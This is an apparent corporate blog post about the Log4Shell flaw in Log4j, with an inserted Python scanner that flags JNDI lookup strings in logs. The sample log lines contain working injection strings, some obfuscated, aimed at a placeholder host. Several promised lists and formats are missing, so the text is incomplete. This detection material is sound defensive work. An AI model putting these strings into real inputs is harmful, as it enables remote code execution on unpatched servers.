Editor’s Note: FISPAN is currently not vulnerable to Log4Shell (CVE-2021-44228) and has not identified any active exploitation at this time.
On Friday, December 9, 2021, a vulnerability was first discovered in the popular video game Minecraft: a user could send a crafted message in the game’s chat window and thereby run arbitrary code on the server without authorization (Remote Code Execution, or RCE). The flaw was traced to Log4j, the Apache logging library for Java. Assigned a CVSS score of 10 out of 10, the highest possible score for a vulnerability, it is now officially tracked as CVE-2021-44228 and has been named Log4Shell.
What is Log4j?
Log4j is a Java library for logging error messages in applications and a core part of Java’s logging ecosystem, used in almost every Java application with logging enabled. Everyone depends on it, from software developers who use it when debugging code to security professionals who rely on logs to keep track of what goes on in their environment.
This vulnerability is dangerous because the barrier to entry is very low: an exploit can be triggered by just sending a chat message or entering the exploit string in a search bar, and according to Java’s own installer, Java currently runs on over 3 billion devices. From the Mars Rover to in-home smart fridges, everything somehow and somewhere relies on code built around this library.
How Does the Log4Shell Exploit Work?
The root cause of this vulnerability is improper input validation, which also appears in the OWASP Top 10 most common vulnerabilities: the input field does not check whether the data it receives can be trusted. The exploit works through a Java runtime interface called JNDI (Java Naming and Directory Interface), which can look up information locally or from remote servers. Any string in the following format, once it is logged, triggers such a lookup and can fetch code that is then executed, hence the name "Remote Code Execution."
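As an added illustration (not part of the original post), the following Python script shows the defender's side of this: a log scanner that flags lines carrying a JNDI lookup string, including ones wrapped in Log4j's own case-conversion and default-value lookups, which a plain substring search for `${jndi:` would miss. The log lines, host names and paths are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Constructed sample log lines (hypothetical hosts and paths, not real traffic).
# Lines 2-4 carry a JNDI lookup string in the User-Agent field; lines 1 and 5 are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /search?q=laptops HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://lookup-host.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 128 "-" "${${lower:j}ndi:rmi://lookup-host.invalid/b}"',
    '10.0.0.3 - - [10/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 128 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://lookup-host.invalid/c}"',
    '10.0.0.8 - - [10/Dec/2021:03:14:13 +0000] "GET /report?day=${date:yyyy-MM-dd} HTTP/1.1" 302 0 "-" "curl/7.79.1"',
]

# Log4j "lookup" wrappers that change the text without changing what the logger
# resolves it to; a plain search for "${jndi:" misses a string wrapped in them,
# so we fold each wrapper back to its literal value before matching.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_WRAPPER = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The lookup itself: ${jndi:<protocol>:...}; the protocol is captured for triage.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int   # 1-based index into the scanned input
    protocol: str  # lookup protocol requested, e.g. ldap, rmi, dns
    raw: str       # the original, un-normalized log line


def normalize(text: str) -> str:
    """Repeatedly unwrap ${lower:x}, ${upper:x} and ${...:-x} to x until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_WRAPPER.sub(lambda m: m.group(1), text)
    return text


def scan(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per line that contains a JNDI lookup after normalization."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = _JNDI_LOOKUP.search(normalize(line))
        if match:
            findings.append(Finding(line_no, match.group(1).lower(), line))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: jndi lookup via {f.protocol}: {f.raw}")
```

Run against the constructed sample it reports lines 2, 3 and 4 (ldap, rmi and dns lookups) and leaves the benign `${date:...}` template on line 5 alone. The normalization step is the part worth keeping in a real pipeline: detection rules that only match the literal `${jndi:` produce clean results on the first wave of scanning and then go quiet while the wrapped variants keep arriving.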
This list is not exhaustive as there are many possible recommendations available.
FISPAN’s Steps to Reduce Vulnerabilities
Thanks to FISPAN’s constant monitoring for security threats, we were notified of the new zero-day vulnerability promptly, and FISPAN immediately took preventive measures:
Based on our research, despite using a vulnerable library, FISPAN was not affected by any of the published exploits, as FISPAN’s copy of the library was used in conjunction with an up-to-date Java runtime.
As this situation evolves rapidly, we can expect the intensity of attacks to only increase. Your best courses of action are to keep up to date with changes, stay vigilant and, last but not least, follow security best practices.
Have Questions About Cyber Security?
Learn more about the state of commercial banking and security in this Security Boulevard article from FISPAN's own Head of Cyber Security, Maryam Hamidirad.
Our security team is also available to answer any questions you may have and can be reached at firstname.lastname@example.org.